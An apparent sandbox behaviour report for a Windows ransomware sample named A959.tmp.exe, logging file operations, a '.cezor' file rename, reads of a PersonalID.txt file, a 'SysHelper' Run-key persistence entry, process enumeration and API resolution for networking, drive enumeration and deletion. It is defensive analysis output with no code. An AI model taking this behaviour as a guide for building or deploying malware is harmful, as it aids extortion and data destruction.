Create C:\Boot\Fonts\wgl4_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\fr-FR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\hu-HU\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\it-IT\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\ja-JP\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\ko-KR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\nb-NO\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\nl-NL\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\pl-PL\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\pt-BR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\pt-PT\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\ru-RU\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\sv-SE\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\tr-TR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-CN\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-HK\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-TW\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\NTUSER.DAT desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Searches\Everywhere.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Searches\Indexed Locations.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Get Info C:\SystemID\PersonalID.txt type = file_type True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe type = size, size_out = 457216 True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe.cezor source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe True 1
Fn
Read C:\SystemID\PersonalID.txt size = 4096, size_out = 42 True 1
Fn
Data
Read C:\SystemID\PersonalID.txt size = 4096, size_out = 0 True 1
Fn
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe size = 38, size_out = 38 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe size = 153605, size_out = 153605 True 1
Fn
Data
Write C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe size = 38 True 1
Fn
Data
Registry (4)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb\A959.tmp.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion value_name = SysHelper, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Process (27)
»
Operation Process Additional Information Success Count Logfile
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files\windows photo viewer\portion-sunday.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\userinit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\rundll32.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\dinotify.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Module (404)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x75e10000 True 3
Fn
Load RPCRT4.dll base_address = 0x76850000 True 1
Fn
Load MPR.dll base_address = 0x741e0000 True 1
Fn
Load WININET.dll base_address = 0x75ad0000 True 1
Fn
Load WINMM.dll base_address = 0x741a0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x76640000 True 1
Fn
Load KERNEL32.dll base_address = 0x75e10000 True 1
Fn
Load USER32.dll base_address = 0x761e0000 True 1
Fn
Load ADVAPI32.dll base_address = 0x779b0000 True 1
Fn
Load SHELL32.dll base_address = 0x76d60000 True 1
Fn
Load ole32.dll base_address = 0x762e0000 True 1
Fn
Load OLEAUT32.dll base_address = 0x76b80000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x74180000 True 1
Fn
Load WS2_32.dll base_address = 0x76c30000 True 1
Fn
Load DNSAPI.dll base_address = 0x74110000 True 1
Fn
Load CRYPT32.dll base_address = 0x75f20000 True 1
Fn
Load msvcr100.dll base_address = 0x758d0000 True 1
Fn
Load Psapi.dll base_address = 0x77e20000 True 1
Fn
Load Shell32.dll base_address = 0x76d60000 True 58
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75e10000 True 3
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\34ab4241-89d8-4896-a0ef-745528a314bb\a959.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb\A959.tmp.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\34ab4241-89d8-4896-a0ef-745528a314bb\a959.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb\A959.tmp.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75e24f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75e21252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75e24208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x75e2359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x75e2435f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x75e249d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75e21856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x75e2186e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x75e23519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x75e3d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x75e27a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x75e21b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x76871635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x76891ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x768cd918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x76893fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x7686f48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x741e2dd6 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x741e2f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x741e3058 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x75aeab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x75b4be5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x75aeb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x75b130f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x75af5c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x75aff18e True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x75af9197 True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x741a26e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7665a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7665bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x76653248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x766545bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x766581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7664d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7667ad1a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x75e2110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x75e23587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x75e25223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x75e253c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75e24435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x75e217d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75e25a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x75e234c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x75e2103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x75e3c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x75e24259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x75e21136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x75e25371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x75e21282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x75e3ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x75e21986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x75e2588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x75e25063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x75e2170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x75e2492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x75e210ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x75e4830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x75e24620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x75e4d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x75e21072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x75e23ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x75e23f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x75e42b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x75e233a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75e25929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x75e2192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75e21700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x75e2469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x75e4594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x75e259e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x75e211c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x75e211a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x75e21222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x75e39af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x75e24442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x75e48baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x75e2168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x75e2183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x75e214b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x75e4896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x75e4828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x75e24c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x75ea4691 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x75e4735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x75e21410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x75e289b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x75e22d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75e43102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x75e25444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x75e42a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x75e3cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x75e234b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x75e2dd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x75e3174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x75e24950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x75e25558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x75e24467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x75e4d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x75e234d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x75e214fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x75e211e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x75e249ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x75e21916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x75e287c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x75e4772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x75e251cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x75e251e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75e211f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x75e21725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x75e24d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x77e845f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x75e2465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x75e258a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x75e21946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77e83002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x75e2495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x77e7e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x75e23c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x75e3ce46 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x75e23da5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x75ea425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x75e434d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x75e3f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x75e23bca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x75e217b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x75ec7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x75e21328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77e91f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x75ea454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEndOfFile, address_out = 0x75e3ce2e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x75e251b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x75e23531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x75e24a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x75e47aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadConsoleW, address_out = 0x75ec739a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x75e4d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x75e28a09 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x75e4d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77e72270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x77e722b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x75ea40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75e214e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x75e21450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x75e217ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x75e25189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75e214c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x75e2e331 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77e90fcb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77e89d35 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x75e23509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75e21809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x75e3ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x75e4d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x75e2179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x75e24493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75e25235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x75e254ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75e24a5d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x761f88f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x761f7809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x761fb17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x76200dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x761f7136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x761f8a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x76203559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x77e825dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x762005ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x761f8bff True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x7624fd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x761f787b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x761f9abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x761f9a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x761f9679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x761f78e2 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x779bdf7e True 1
Fn
